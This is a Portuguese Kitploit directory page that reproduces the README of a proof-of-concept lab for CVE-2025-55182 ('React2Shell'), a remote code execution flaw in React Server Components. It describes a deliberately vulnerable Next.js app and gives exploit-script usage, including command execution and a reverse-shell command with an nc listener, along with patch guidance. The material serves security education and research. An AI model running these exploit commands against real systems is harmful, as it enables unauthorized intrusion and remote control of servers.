Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/mooowu/cve-2025-55182-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso RemotoDesenvolvimento de PayloadsLabs e Prática
GitHubmooowu/cve-2025-55182-poc

cve-2025-55182-poc

Ambiente de laboratório e exploit PoC para CVE-2025-55182 (React2Shell), uma vulnerabilidade crítica de RCE em React Server Components. Inclui aplicativo vulnerável, scripts de exploit e scanner para pesquisa e educação em segurança.

5há 7 mesesAinda não revisado
Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Laboratório de Análise da Vulnerabilidade CVE-2025-55182 (React2Shell)

Este repositório contém um ambiente completo para analisar e reproduzir a CVE-2025-55182, uma vulnerabilidade crítica de Execução Remota de Código (RCE) nos React Server Components (RSC) que afeta React 19.x e Next.js 15.x.

⚠️ AVISO: Este projeto contém intencionalmente código vulnerável. NÃO implante isto em um servidor público ou ambiente de produção.

🔍 Visão Geral da Vulnerabilidade

  • ID CVE: CVE-2025-55182
  • Alias: React2Shell
  • Pontuação CVSS: 10.0 (CRÍTICA)
  • Tipo de Vulnerabilidade: CWE-502 (Desserialização de Dados Não Confiáveis)
  • Componentes Afetados:
    • React Server Components (19.0.0 - 19.2.0)
    • Next.js (15.0.0 - 16.0.7)
    • react-server-dom-webpack, react-server-dom-turbopack

Mecanismo

A vulnerabilidade existe na forma como o runtime dos React Server Components processa dados serializados de requisições HTTP (Server Actions). Um atacante pode criar um payload malicioso do protocolo "Flight" que, quando desserializado pelo servidor, executa código arbitrário antes que as verificações de autenticação ocorram.

📂 Estrutura do Projeto

root@kitploit:~
react2shell/
├── vulnerable-app/       # Vulnerable Next.js 15 application
│   ├── app/
│   │   ├── actions.ts    # Vulnerable Server Actions
│   │   └── page.tsx      # UI for testing vulnerability
│   ├── Dockerfile        # Container definition
│   └── package.json
├── exploit/              # Exploit tools
│   ├── exploit.py        # Python PoC exploit
│   ├── scanner.py        # Vulnerability scanner
│   └── quick_exploit.sh  # Simple bash exploit
├── docs/                 # Analysis documentation
└── docker-compose.yml    # Isolated lab environment

🚀 Começando

Pré-requisitos

  • Docker e Docker Compose
  • Python 3.x (para executar exploits localmente)

1. Inicie o Ambiente do Laboratório

Execute o aplicativo vulnerável em um contêiner isolado:

root@kitploit:~
docker-compose up -d --build

O aplicativo estará disponível em http://localhost:3000.

2. Verifique o Aplicativo

Acesse http://localhost:3000 no seu navegador. Você deve ver a interface "React2Shell Lab" com vários painéis de teste:

  • Execução de Comandos: Teste a injeção direta de comandos
  • Desserialização Insegura: Teste exploits de desserialização baseados em JSON
  • Leitura Arbitrária de Arquivos: Teste path traversal
  • Informações do Sistema: Veja os detalhes do sistema (para verificar o impacto da RCE)

⚔️ Exploração

Fornecemos várias ferramentas para testar a vulnerabilidade.

Usando o Exploit em Python

  1. Instale os requisitos:

    root@kitploit:~
    pip install -r exploit/requirements.txt
    
  2. Verifique se está vulnerável:

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 --check
    
  3. Execute um comando:

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 -c "id"
    
  4. Reverse Shell (requer um listener, ex.: nc -lvnp 4444):

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 --revshell -l HOST_IP -p 4444
    

Usando o Scanner

Escaneie instâncias vulneráveis de React/Next.js:

root@kitploit:~
python3 exploit/scanner.py -u http://localhost:3000

🛡️ Mitigação

Para corrigir essa vulnerabilidade em seus próprios aplicativos:

  1. Atualize as Dependências:

    • Atualize o React para a versão 19.3.0 ou posterior.
    • Atualize o Next.js para a versão 15.0.5, 15.1.9 ou 16.0.8, dependendo do seu branch.
  2. Verifique o Patch: Verifique o package.json para garantir que os pacotes react-server-dom-* estejam atualizados.

📝 Aviso Legal

Este projeto é apenas para fins educacionais e pesquisa em segurança. Os autores não assumem responsabilidade pelo uso indevido deste material.

Baixar ferramenta